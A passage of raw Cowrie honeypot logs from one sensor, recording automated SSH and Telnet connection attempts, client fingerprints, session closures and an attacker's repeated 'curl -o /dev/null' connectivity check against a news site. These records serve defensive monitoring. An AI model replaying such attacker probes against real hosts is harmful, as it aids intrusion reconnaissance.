{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.623991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.626845Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.760381Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.798558Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.815895Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.818733Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.827123Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.861975Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.919903Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.925091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.925923Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.936150Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.938324Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.031355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.032376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.037285Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.038348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.043614Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.093395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.094421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.100622Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.101800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.115686Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.149053Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.150771Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.199862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.200893Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.206513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.207767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.345268Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.347324Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:16.409608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.410631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.414561Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.416178Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.452638Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.454247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.488476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.490024Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.547191Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.548388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.590831Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.592847Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.616572Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.617447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.618650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.620280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.closed","duration":"180.3","message":"Connection lost after 180.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.621203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.632081Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.670856Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.723212Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.764784Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.801494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","size":0,"shasum":"2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/2c74f32a6ebdc4c52ab835064448d0d47b00e69ac4feb6d3bbe3ee7919fb871b after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.802446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.closed","duration":"180.5","message":"Connection lost after 180.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:32:16.803578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51710,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f9192eeb87f","protocol":"ssh","message":"New connection: 217.72.205.35:51710 (1.2.3.4:22) [session: 5f9192eeb87f]","sensor":"my-vps","timestamp":"2025-09-09T08:35:18.967188Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:35:18.968584Z","src_ip":"217.72.205.35","session":"5f9192eeb87f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"00f672d3cc22","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: 00f672d3cc22]","sensor":"my-vps","timestamp":"2025-09-09T08:36:54.105344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T08:36:54.270856Z","src_ip":"212.227.235.229","session":"00f672d3cc22"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T08:36:54.432174Z","src_ip":"212.227.235.229","session":"00f672d3cc22"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T08:36:56.241124Z","src_ip":"212.227.235.229","session":"00f672d3cc22"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:36:56.242927Z","src_ip":"212.227.235.229","session":"00f672d3cc22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58614,"dst_ip":"1.2.3.4","dst_port":23,"session":"06e8e31a6b94","protocol":"telnet","message":"New connection: 212.227.235.229:58614 (1.2.3.4:23) [session: 06e8e31a6b94]","sensor":"my-vps","timestamp":"2025-09-09T08:38:00.233230Z"}
{"eventid":"cowrie.session.closed","duration":17.34213662147522,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:38:17.575294Z","src_ip":"212.227.235.229","session":"06e8e31a6b94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59710,"dst_ip":"1.2.3.4","dst_port":23,"session":"365b012ca8c4","protocol":"telnet","message":"New connection: 212.227.235.229:59710 (1.2.3.4:23) [session: 365b012ca8c4]","sensor":"my-vps","timestamp":"2025-09-09T08:38:21.542114Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56122,"dst_ip":"1.2.3.4","dst_port":23,"session":"d58b9f89ac69","protocol":"telnet","message":"New connection: 212.227.235.229:56122 (1.2.3.4:23) [session: d58b9f89ac69]","sensor":"my-vps","timestamp":"2025-09-09T08:38:22.162750Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35516,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ac3546fc23c","protocol":"telnet","message":"New connection: 212.227.235.229:35516 (1.2.3.4:23) [session: 2ac3546fc23c]","sensor":"my-vps","timestamp":"2025-09-09T08:38:28.923946Z"}
{"eventid":"cowrie.session.closed","duration":13.374827146530151,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:38:34.916871Z","src_ip":"212.227.235.229","session":"365b012ca8c4"}
{"eventid":"cowrie.session.closed","duration":10.067610025405884,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:38:38.991485Z","src_ip":"212.227.235.229","session":"2ac3546fc23c"}
{"eventid":"cowrie.session.closed","duration":120.00165486335754,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:40:22.164306Z","src_ip":"212.227.235.229","session":"d58b9f89ac69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50640,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fc6127af341","protocol":"ssh","message":"New connection: 212.227.125.160:50640 (1.2.3.4:22) [session: 0fc6127af341]","sensor":"my-vps","timestamp":"2025-09-09T08:40:57.171905Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:40:57.244447Z","src_ip":"212.227.125.160","session":"0fc6127af341"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44103,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1554d0a7ed2","protocol":"telnet","message":"New connection: 212.227.125.160:44103 (1.2.3.4:23) [session: c1554d0a7ed2]","sensor":"my-vps","timestamp":"2025-09-09T08:41:29.605973Z"}
{"eventid":"cowrie.session.closed","duration":13.233085870742798,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:41:42.838990Z","src_ip":"212.227.125.160","session":"c1554d0a7ed2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c5b61ea3187","protocol":"ssh","message":"New connection: 212.227.125.160:6103 (1.2.3.4:22) [session: 1c5b61ea3187]","sensor":"my-vps","timestamp":"2025-09-09T08:41:51.837154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T08:41:51.937528Z","src_ip":"212.227.125.160","session":"1c5b61ea3187"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T08:41:52.044133Z","src_ip":"212.227.125.160","session":"1c5b61ea3187"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs"